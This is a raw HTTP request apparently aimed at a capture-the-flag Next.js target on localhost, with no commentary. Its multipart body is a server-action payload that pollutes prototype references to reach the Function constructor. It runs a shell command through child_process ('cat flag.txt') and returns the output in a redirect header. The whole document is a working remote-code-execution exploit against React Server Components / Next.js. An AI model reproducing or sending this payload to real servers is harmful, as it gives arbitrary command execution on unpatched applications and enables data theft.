POST / HTTP/1.1
Host: localhost:3000
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate, br
Accept: */*
Connection: keep-alive
Next-Action: x
X-Nextjs-Request-Id: caad7346
X-Nextjs-Html-Request-Id: 3442aa65e94d4eee4b8d
Content-Type: multipart/form-data; boundary=----HacxMeBoundaryX9K2pLvN4MqR8TdF
Content-Length: 708

------HacxMeBoundaryX9K2pLvN4MqR8TdF
Content-Disposition: form-data; name="0"

{"then":"$1:__proto__:then","status":"resolved_model","reason":-1,"value":"{\"then\":\"$B1337\"}","_response":{"_prefix":"var res=process.mainModule.require('child_process').execSync('cat flag.txt').toString().trim().replace(/\\n/g, ' | ');;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});","_chunks":"$Q2","_formData":{"get":"$1:constructor:constructor"}}}
------HacxMeBoundaryX9K2pLvN4MqR8TdF
Content-Disposition: form-data; name="1"

"$@0"
------HacxMeBoundaryX9K2pLvN4MqR8TdF
Content-Disposition: form-data; name="2"

[]
------HacxMeBoundaryX9K2pLvN4MqR8TdF--
